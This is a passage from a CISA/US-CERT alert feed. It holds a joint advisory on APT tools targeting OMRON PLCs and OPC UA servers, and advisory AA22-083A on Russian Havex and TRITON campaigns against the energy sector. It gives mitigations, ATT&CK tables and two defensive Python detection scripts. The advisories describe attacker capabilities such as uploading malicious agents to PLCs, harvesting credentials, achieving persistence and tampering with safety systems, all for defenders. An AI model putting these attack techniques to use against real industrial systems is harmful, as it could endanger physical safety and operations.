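] + [f"{110 + i}.0 udp 10.20.0.77 10.20.1.5 1740" for i in range(25)] + [
    f"{200 + i}.0 udp 10.20.0.11 10.20.1.5 1740" for i in range(3)
]

if __name__ == "__main__":
    flows, rejected = parse_flows(SAMPLE_FLOWS)
    for alert in detect(flows):
        print(alert)
    print("rejected records:", rejected)
```

The threshold and window need tuning against a baseline of normal engineering traffic before the burst rule is useful in production.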

APT Tool for OMRON 

The APT actors’ tool for OMRON devices has modules that can interact by:

  • Scanning for OMRON using the Factory Interface Network Service (FINS) protocol;
  • Parsing the Hypertext Transfer Protocol (HTTP) response from OMRON devices;
  • Retrieving the media access control (MAC) address of the device;
  • Polling for specific devices connected to the PLC;
  • Backing up/restoring arbitrary files to/from the PLC; and
  • Loading a custom malicious agent on OMRON PLCs for additional attacker-directed capability.

Additionally, the OMRON modules can upload an agent that allows a cyber actor to connect and initiate commands—such as file manipulation, packet captures, and code execution—via HTTP and/or Hypertext Transfer Protocol Secure (HTTPS). 

Refer to the appendix for TTPs associated with this tool.

APT Tool for OPC UA 

The APT actors’ tool for OPC UA has modules with basic functionality to identify OPC UA servers and to connect to an OPC UA server using default or previously compromised credentials. The client can read the OPC UA structure from the server and potentially write tag values available via OPC UA.

Refer to the appendix for TTPs associated with this tool.

Mitigations

Note: these mitigations are provided to enable network defenders to begin efforts to protect systems and devices from new capabilities. They have not been verified against every environment and should be tested prior to implementing.

DOE, CISA, NSA, and the FBI recommend all organizations with ICS/SCADA devices implement the following proactive mitigations:

  • Isolate ICS/SCADA systems and networks from corporate and internet networks using strong perimeter controls, and limit any communications entering or leaving ICS/SCADA perimeters. 
  • Enforce multifactor authentication for all remote access to ICS networks and devices whenever possible.
  • Have a cyber incident response plan, and exercise it regularly with stakeholders in IT, cybersecurity, and operations.
  • Change all passwords to ICS/SCADA devices and systems on a consistent schedule, especially all default passwords, to device-unique strong passwords to mitigate password brute force attacks and to give defender monitoring systems opportunities to detect common attacks.
  • Maintain known-good offline backups for faster recovery upon a disruptive attack, and conduct hashing and integrity checks on firmware and controller configuration files to ensure validity of those backups. 
  • Limit ICS/SCADA systems’ network connections to only specifically allowed management and engineering workstations.
  • Robustly protect management systems by configuring Device Guard, Credential Guard, and Hypervisor Code Integrity (HVCI). Install Endpoint Detection and Response (EDR) solutions on these subnets and ensure strong anti-virus file reputation settings are configured.
  • Implement robust log collection and retention from ICS/SCADA systems and management subnets.
  • Leverage a continuous OT monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions and lateral movement. For enhanced network visibility to potentially identify abnormal traffic, consider using CISA’s open-source Industrial Control Systems Network Protocol Parsers (ICSNPP).
  • Ensure all applications are only installed when necessary for operation. 
  • Enforce principle of least privilege. Only use admin accounts when required for tasks, such as installing software updates. 
  • Investigate symptoms of a denial of service or connection severing, which exhibit as delays in communications processing, loss of function requiring a reboot, and delayed actions to operator comments as signs of potential malicious activity.
  • Monitor systems for loading of unusual drivers, especially an ASRock driver if no ASRock driver is normally used on the system.
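
One way to act on the driver-monitoring mitigation above, added here as an example and not part of the advisory: triage driver-load events so that AsrDrv103.sys or any ASRock-signed driver is rated highest on hosts where no ASRock driver is expected. The event field names follow Sysmon Event ID 6 (Driver loaded); the host names, baselines, signer string, and sample events are constructed assumptions.

```python
import ntpath

NAMED_DRIVER = "asrdrv103.sys"  # file name given in the advisory (CVE-2020-15368)
VENDOR_HINT = "asrock"          # matched case-insensitively against the signer

# Assumed site baselines (hypothetical host names and driver lists).
ASROCK_HOSTS = {"EWS-03"}       # hosts where an ASRock driver is normal
DRIVER_BASELINE = {
    "EWS-01": {"disk.sys", "e1d68x64.sys"},
    "EWS-03": {"disk.sys", "asrdrv103.sys"},
}

RANK = {"low": 1, "medium": 2, "high": 3}


def triage(event):
    """Return (severity, reasons) for one driver-load event, or (None, [])."""
    host = event.get("Computer", "").upper()
    # ntpath parses Windows paths correctly even when this runs on Linux.
    name = ntpath.basename(event.get("ImageLoaded", "")).lower()
    signer = event.get("Signature", "").lower()
    findings = []

    is_asrock = name == NAMED_DRIVER or VENDOR_HINT in signer
    if is_asrock and host not in ASROCK_HOSTS:
        findings.append(("high", "asrock-driver-on-host-without-asrock-baseline"))
    elif name == NAMED_DRIVER:
        # Expected vendor, but this is still the known-vulnerable driver.
        findings.append(("medium", "known-vulnerable-driver-loaded"))

    if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
        findings.append(("medium", "signature-not-valid"))

    baseline = DRIVER_BASELINE.get(host)
    if baseline is None:
        # Without a baseline nothing can be called "unusual"; report the gap.
        findings.append(("low", "host-has-no-driver-baseline"))
    elif name not in baseline:
        findings.append(("low", "driver-not-in-host-baseline"))

    if not findings:
        return None, []
    severity = max((s for s, _ in findings), key=RANK.get)
    return severity, [reason for _, reason in findings]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "EWS-01", "ImageLoaded": r"C:\Windows\System32\drivers\disk.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"Computer": "EWS-01", "ImageLoaded": r"C:\Users\Public\AsrDrv103.sys",
     "Signed": "true", "Signature": "ASROCK Incorporation", "SignatureStatus": "Valid"},
    {"Computer": "EWS-03", "ImageLoaded": r"C:\Windows\System32\drivers\AsrDrv103.sys",
     "Signed": "true", "Signature": "ASROCK Incorporation", "SignatureStatus": "Valid"},
    {"Computer": "HMI-02", "ImageLoaded": r"C:\Temp\helper.sys",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Computer"], ntpath.basename(ev["ImageLoaded"]), triage(ev))
```
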
Resources

For additional guidance on securing OT devices, see 

For more information on APT actors’ tools and TTPs, refer to: 

Disclaimer

The information in this report is being provided “as is” for informational purposes only. DOE, CISA, NSA, and the FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the DOE, CISA, NSA, or the FBI, and this guidance shall not be used for advertising or product endorsement purposes.

Acknowledgements

The DOE, CISA, NSA, and the FBI would like to thank Dragos, Mandiant, Microsoft, Palo Alto Networks, and Schneider Electric for their contributions to this joint CSA.

Appendix: APT Cyber Tools Tactics, Techniques, and Procedures

See tables 1 through 3 for TTPs associated with the cyber actors’ tools described in this CSA mapped to the MITRE ATT&CK for ICS framework. See the ATT&CK for ICS framework for all referenced threat actor tactics and techniques.

Table 1: APT Tool for Schneider Electric ICS TTPs

Tactic: Technique(s)
  • Execution: Command-Line Interface [T0807]; Scripting [T0853]
  • Persistence: Modify Program [T0889]; System Firmware [T0857]; Valid Accounts [T0859]
  • Discovery: Remote System Discovery [T0846]; Remote System Information Discovery [T0888]
  • Lateral Movement: Default Credentials [T0812]; Program Download [T0843]; Valid Accounts [T0859]
  • Collection: Monitor Process State [T0801]; Program Upload [T0845]; Monitor Process State [T0801]
  • Command and Control: Commonly Used Port [T0885]; Standard Application Layer Protocol [T0869]
  • Inhibit Response Function: Block Reporting Message [T0804]; Block Command Message [T0803]; Denial of Service [T0814]; Data Destruction [T0809]; Device Restart/Shutdown [T0816]; System Firmware [T0857]
  • Impair Process Control: Modify Parameter [T0836]; Unauthorized Command Message [T0855]
  • Impact: Denial of Control [T0813]; Denial of View [T0815]; Loss of Availability [T0826]; Loss of Control [T0827]; Loss of Productivity and Revenue [T0828]; Manipulation of Control [T0831]; Theft of Operational Information [T0882]

 

Table 2: APT Tool for OMRON ICS TTPs

Tactic: Technique(s)
  • Initial Access: Remote Services [T0886]
  • Execution: Command-Line Interface [T0807]; Scripting [T0853]; Change Operating Mode [T0858]; Modify Controller Tasking [T0821]; Native API [T0834]
  • Persistence: Modify Program [T0889]; Valid Accounts [T0859]
  • Evasion: Change Operating Mode [T0858]
  • Discovery: Network Sniffing [T0842]; Remote System Discovery [T0846]; Remote System Information Discovery [T0888]
  • Lateral Movement: Default Credentials [T0812]; Lateral Tool Transfer [T0867]; Program Download [T0843]; Remote Services [T0886]; Valid Accounts [T0859]
  • Collection: Detect Operating Mode [T0868]; Monitor Process State [T0801]; Program Upload [T0845]
  • Command and Control: Commonly Used Port [T0885]; Standard Application Layer Protocol [T0869]
  • Inhibit Response Function: Service Stop [T0881]
  • Impair Process Control: Modify Parameter [T0836]; Unauthorized Command Message [T0855]
  • Impact: Damage to Property [T0879]; Loss of Safety [T0837]; Manipulation of Control [T0831]; Theft of Operational Information [T0882]

 

Table 3: APT Tool for OPC UA ICS TTPs

Tactic: Technique(s)
  • Execution: Command-Line Interface [T0807]; Scripting [T0853]
  • Persistence: Valid Accounts [T0859]
  • Discovery: Remote System Discovery [T0846]; Remote System Information Discovery [T0888]
  • Lateral Movement: Valid Accounts [T0859]
  • Collection: Monitor Process State [T0801]; Point & Tag Identification [T0861]
  • Command and Control: Commonly Used Port [T0885]; Standard Application Layer Protocol [T0869]
  • Impact: Manipulation of View [T0832]; Theft of Operational Information [T0882]

Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov

Revisions
  • April 13, 2022: Initial Version
  • April 14, 2022: Added Resources

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-083A: Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector

US-CERT Security Alerts - Thu, 03/24/2022 - 06:00
Original release date: March 24, 2022
Summary

Actions to Take Today to Protect Energy Sector Networks:
• Implement and ensure robust network segmentation between IT and ICS networks.
• Enforce MFA to authenticate to a system.
• Manage the creation of, modification of, use of—and permissions associated with—privileged accounts.

This joint Cybersecurity Advisory (CSA)—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Energy (DOE)—provides information on multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 that targeted U.S. and international Energy Sector organizations. CISA, the FBI, and DOE responded to these campaigns with appropriate action in and around the time that they occurred. CISA, the FBI, and DOE are sharing this information in order to highlight historical tactics, techniques, and procedures (TTPs) used by adversaries to target U.S. and international Energy Sector organizations.

On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.[1]

  • Global Energy Sector Intrusion Campaign, 2011 to 2018: the FSB conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data. 
    • One of the indicted FSB officers was involved in campaign activity that involved deploying Havex malware to victim networks. 
    • The other two indicted FSB officers were involved in activity targeting U.S. Energy Sector networks from 2016 through 2018.
  • Compromise of Middle East-based Energy Sector organization with TRITON Malware, 2017: Russian cyber actors with ties to the TsNIIKhM gained access to and leveraged TRITON (also known as HatMan) malware to manipulate a foreign oil refinery’s ICS controllers. TRITON was designed to specifically target Schneider Electric’s Triconex Tricon safety systems and is capable of disrupting those systems. Schneider Electric has issued a patch to mitigate the risk of the TRITON malware’s attack vector; however, network defenders should install the patch and remain vigilant against these threat actors’ TTPs.
    • The indicted TsNIIKhM cyber actor is charged with attempt to access U.S. protected computer networks and to cause damage to an energy facility.
    • The indicted TsNIIKhM cyber actor was a co-conspirator in the deployment of the TRITON malware in 2017.

This CSA provides the TTPs used by indicted FSB and TsNIIKhM actors in cyber operations against the global Energy Sector. Specifically, this advisory maps TTPs used in the global Energy Sector campaign and the compromise of the Middle East-based Energy Sector organization to the MITRE ATT&CK for Enterprise and ATT&CK for ICS frameworks.

CISA, the FBI, and DOE assess that state-sponsored Russian cyber operations continue to pose a threat to U.S. Energy Sector networks. CISA, the FBI, and DOE urge the Energy Sector and other critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory and Appendix A to reduce the risk of compromise. 

For more information on Russian state-sponsored malicious cyber activity, see CISA's Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA's Shields Up Technical Guidance webpage. 

Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s (DOS) Rewards for Justice program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to rewardsforjustice.net.


Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10, and the ATT&CK for ICS framework. See the ATT&CK for Enterprise and ATT&CK for ICS frameworks for all referenced threat actor tactics and techniques.

Global Energy Sector Intrusion Campaign, 2011 to 2018

From at least 2011 through 2018, the FSB (also known as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala) conducted an intrusion campaign against international and U.S. Energy Sector organizations. The threat actor gained remote access to and deployed malware designed to collect ICS-related information on compromised Energy Sector networks, and exfiltrated enterprise and ICS data.

Beginning in 2013 and continuing through 2014, the threat actor leveraged Havex malware on Energy Sector networks. The threat actor gained access to these victim networks via spearphishing emails, redirects to compromised websites, and malicious versions of legitimate software updates on multiple ICS vendor websites. The new software updates contained installations of Havex malware, which infected systems of users who downloaded the compromised updates.

Havex is a remote access Trojan (RAT) that communicates with a command and control (C2) server. The C2 server deploys payloads that enumerate all collected network resources and uses the Open Platform Communications (OPC) standard to gather information about connected control systems devices and resources within the network. Havex allowed the actor to install additional malware and extract data, including system information, lists of files and installed programs, e-mail address books, and virtual private network (VPN) configuration files. The Havex payload can cause common OPC platforms to crash, which could cause a denial-of-service condition on applications that rely on OPC communications. Note: for additional information on Havex, see CISA ICS Advisory ICS Focused Malware and CISA ICS Alert ICS Focused Malware (Update A).

Beginning in 2016, the threat actor began widely targeting U.S. Energy Sector networks. The actor conducted these attacks in two stages: first targeting third-party commercial organizations (such as vendors, integrators, and suppliers) and then targeting Energy Sector organizations. The threat actor used the compromised third-party infrastructure to conduct spearphishing, watering hole, and supply chain attacks to harvest Energy Sector credentials and to pivot to Energy Sector enterprise networks. After obtaining access to the U.S. Energy Sector networks, the actor conducted network discovery, moved laterally, gained persistence, then collected and exfiltrated information pertaining to ICS from the enterprise, and possibly operational technology (OT), environments. Exfiltrated information included: vendor information, reference documents, ICS architecture, and layout diagrams.

For more detailed information on FSB targeting of U.S. Energy Sector networks, see CISA Alert Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors.

Refer to Appendix A for TTPs of Havex malware and TTPs used by the actor in the 2016 to 2018 targeting of U.S. Energy Sector networks, as well as associated mitigations.

Compromise of Middle East-based Energy Sector Organization with TRITON Malware, 2017

In 2017, Russian cyber actors with ties to TsNIIKhM gained access to and manipulated a foreign oil refinery’s safety devices. TsNIIKhM actors used TRITON malware on the ICS controllers, which resulted in the refinery shutting down for several days. 

TRITON is a custom-built, sophisticated, multi-stage malware affecting Schneider Electric’s Triconex Tricon, a safety programmable logic controller (PLC) (also referred to as a safety instrumented system [SIS]), which monitors industrial processes to prevent hazardous conditions. TRITON is capable of directly interacting with, remotely controlling, and compromising these safety systems. As these systems are used in a large number of environments, the capacity to disable, inhibit, or modify the ability of a process to fail safely could result in physical consequences. Note: for additional information on affected products, see CISA ICS Advisory Schneider Electric Triconex Tricon (Update B).

TRITON malware affects Triconex Tricon PLCs by modifying in-memory firmware to add additional programming. The extra functionality allows an attacker to read/modify memory contents and execute custom code, disabling the safety system. 

TRITON malware has multiple components, including a custom Python script, four Python modules, and malicious shellcode that contains an injector and a payload. For detailed information on TRITON’s components, refer to CISA Malware Analysis Report (MAR): HatMan: Safety System Targeted Malware (Update B).

Note: the indicted TsNIIKhM cyber actor was also involved in activity targeting U.S. Energy Sector companies in 2018, and other TsNIIKhM-associated actors have targeted a U.S.-based company’s facilities in an attempt to access the company’s OT systems. To date, CISA, FBI, and DOE have no information to indicate these actors have intentionally disrupted any U.S. Energy Sector infrastructure. 

Refer to Appendix A for TTPs used by TRITON as well as associated mitigations. 

Mitigations

Enterprise Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their corporate enterprise network. These mitigations are tailored to combat multiple enterprise techniques observed in these campaigns (refer to Appendix A for observed TTPs and additional mitigations).

Privileged Account Management 
  • Manage the creation of, modification of, use of—and permissions associated with—privileged accounts, including SYSTEM and root.
Password Policies
  • Set and enforce secure password policies for accounts.
Disable or Remove Features or Programs
  • Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
Audit 
  • Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.
Operating System Configuration 
  • Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
Multifactor Authentication
  • Enforce multifactor authentication (MFA) by requiring users to provide two or more pieces of information (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.
Filter Network Traffic    
  • Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
Network Segmentation
  • Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a demilitarized zone (DMZ) to contain any internet-facing services that should not be exposed from the internal network.
Limit Access to Resources over the Network
  • Prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, Remote Desktop Protocol (RDP) gateways, etc.
Execution Prevention
  • Block execution of code on a system through application control, and/or script blocking.
Industrial Control System Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their ICS/OT environment.

Network Segmentation
  • Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised. 
    • Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standards and Technology Special Publication 800-82: Guide to Industrial Control Systems (ICS) Security. Further segmentation should be applied to portions of the network that are reliant on one another by functionality. Figure 5 on page 26 of the CISA ICS Defense in Depth Strategy document describes this architecture.
    • Use one-way communication diodes to prevent external access, whenever possible.
    • Set up DMZs to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure.
    • Employ reliable network security protocols and services where feasible.
  • Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access. This same principle can be applied to segmentation of portions of the process for which devices are used. As an example, systems that are only involved in the creation of one component within an assembly line that is not directly related to another component can be on separate VLANs, which allows for identification of any unexpected communication, as well as segmentation against potential risk exposure on a larger scale.
  • Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally. 
    • Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and rules for filtering traffic on routers and switches.
    • Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services).
    • Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic).
    • Configure security incident and event monitoring to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.
ICS Best Practices
  • Update all software. Use a risk-based assessment strategy to determine which ICS networks, assets, and zones should participate in the patch management program. 
  • Test all patches in out-of-band testing environments before implementation into production environments.
  • Implement application allow listing on human machine interfaces and engineering workstations.
  • Harden software configuration on field devices, including tablets and smartphones.
  • Replace all end-of-life software and hardware devices.
  • Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation).
  • Restrict and manage remote access software. Enforce MFA for remote access to ICS networks.
  • Configure encryption and security for network protocols within the ICS environment.
  • Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware. 
  • Disallow any devices that do not live solely on the ICS environment from communicating on the platform. ‘Transient devices’ provide risk exposure to the ICS environment from malicious activity in the IT or other environments to which they connect.
  • Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies. 
  • Maintain robust host logging on critical devices within the ICS environment, such as jump boxes, domain controllers, repository servers, etc. These logs should be aggregated into a centralized log server for review. 
  • Ensure robust physical security is in place to prevent unauthorized personnel from accessing controlled spaces that house ICS equipment.
  • Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline.
Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

References

[1] https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
[2] https://collaborate.mitre.org/attackics/index.php/Software/S0003 
[3] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[4] https://collaborate.mitre.org/attackics/index.php/Software/S0013 

APPENDIX A: CAMPAIGN AND MALWARE TACTICS, TECHNIQUES, AND PROCEDURES

Global Energy Sector Campaign: Havex Malware

Table 1 maps Havex’s capabilities to the ATT&CK for Enterprise framework, and table 2 maps Havex’s capabilities to the ATT&CK for ICS framework. Table 1 also provides associated mitigations. For additional mitigations, refer to the Mitigations section of this advisory.

Table 1: Enterprise Domain Tactics and Techniques for Havex [2]

Tactic Technique Use Detection/Mitigations

Persistence [TA0003]

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

Havex adds Registry Run keys to achieve persistence.

Monitor: monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.

Privilege Escalation [TA0004]

Process Injection [T1055]

Note: this technique also applies to:

  • Tactic: Defense Evasion [TA0005]

Havex injects itself into explorer.exe.

Behavior Prevention on End Point: use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, Application Programming Interface (API) call, etc., behavior.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Defense Evasion [TA0005]

Indicator Removal on Host: File Deletion [T1070.004]

Havex contains a cleanup module that removes traces of itself from victim networks.

Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network, which an adversary could introduce. Some monitoring tools may collect command-line arguments but may not capture DEL commands since DEL is a native function within cmd.exe.

Credential Access [TA0006]

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

Havex may contain a publicly available web browser password recovery tool.

Password Policies: set and enforce secure password policies for accounts.

Discovery [TA0007]

Account Discovery: Email Account [T1087.003]

Havex collects address book information from Outlook.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation (WMI) and PowerShell.

File and Directory Discovery [T1083]

Havex collects information about available drives, default browser, desktop file list, My Documents, internet history, program files, and root of available drives.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

Process Discovery [T1057]

Havex collects information about running processes.

Monitor: normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

System Information Discovery [T1082]

Havex collects information about the OS and computer name.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.

System Network Configuration Discovery [T1016]

Havex collects information about the internet adapter configuration.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

System Owner/User Discovery [T1033]

Havex collects usernames.

Collection [TA0009]

Archive Collected Data [T1560]

Havex writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Command and Control [TA0011]

Data Encoding: Standard Encoding [T1132.001]

Havex uses standard Base64 + bzip2 or standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.

Detect: analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

 

Table 2: ICS Domain Tactics and Techniques for Havex [3]

Tactic | Technique | Use

Initial Access

Spearphishing Attachment [T0865]

Havex is distributed through a Trojanized installer attached to emails.

Supply Chain Compromise [T0862]

Note: this activity also applies to Tactic: Drive by Compromise [T0817]

Havex is distributed through Trojanized installers planted on compromised vendor websites.

Execution

User Execution [T0863]

Execution of Havex relies on a user opening a Trojanized installer attached to an email.

Discovery

Remote System Discovery [T0846]

Havex uses Windows networking (WNet) to discover all the servers, including OPC servers, that are reachable by the compromised machine over the network.

Remote System Information Discovery [T0888]

Havex gathers server information, including CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Collection

Automated Collection [T0802]

Havex gathers information about connected control systems devices.

Point & Tag Identification [T0861]

Havex can enumerate OPC tags; specifically tag name, type, access, and ID.

Inhibit Response Function

Denial of Service [T0814]

Havex has caused multiple common OPC platforms to intermittently crash.

Impact

Denial of Control [T0813]

Havex can cause PLCs to be unable to control connected systems.

Global Energy Sector Campaign: 2016 to 2018 U.S. Energy Sector Targeting

Table 3 maps the 2016 to 2018 U.S. Energy Sector targeting activity to the MITRE ATT&CK Enterprise framework. Mitigations for techniques are also provided in the table. For additional mitigations, refer to the Mitigations section of this advisory.

Table 3: Energy Sector Campaign, 2016 to 2018 targeting U.S. Energy Sector: Observed MITRE ATT&CK Enterprise Tactics and Techniques

Tactic | Technique | Use | Detection/Mitigations

Reconnaissance [TA0043]

Gather Victim Identity Information: Credentials [T1589.001]

The threat actor harvested credentials of third-party commercial organizations by sending spearphishing emails that contained a PDF attachment. The PDF attachment contained a shortened URL that, when clicked, led users to a website that prompted the user for their email address and password.
The threat actor harvested credentials of Energy Sector targets by sending spearphishing emails with a malicious Microsoft Word document or links to the watering holes created on compromised third-party websites.

Note: this activity also applies to: 

  • Tactic: Reconnaissance [TA0043], Technique: Phishing for Information [T1598]

Software Configuration: implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Resource Development [TA0042]

Compromise Infrastructure: Server [T1584.004]

The threat actor created watering holes on compromised third-party organizations’ domains.

This activity typically takes place outside the visibility of target organizations, making detection of this behavior difficult. Ensure that users browse the internet securely. Prevent intentional and unintentional download of malware or rootkits, and prevent users from accessing infected or malicious websites. Treat all traffic as untrusted, even if it comes from a partner website or popular domain.

Initial Access [TA0001]

Valid Accounts [T1078]

The threat actor obtained access to Energy Sector targets by leveraging compromised third-party infrastructure and previously compromised Energy Sector credentials against remote access services and infrastructure—specifically VPN, RDP, and Outlook Web Access—where MFA was not enabled.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Update Software: perform regular software updates to mitigate exploitation risk.

Exploit Protection: use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

Application Isolation and Sandboxing: restrict execution of code to a virtual environment on or in transit to an endpoint system.

External Remote Services [T1133]

The threat actor installed VPN clients on compromised third-party targets to connect to Energy Sector networks.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Execution [TA0002]

Command and Scripting Interpreter: PowerShell [T1059.001]

During an RDP session, the threat actor used a PowerShell Script to create an account within a victim’s Microsoft Exchange Server. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Antivirus/Antimalware: use signatures or heuristics to detect malicious software.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

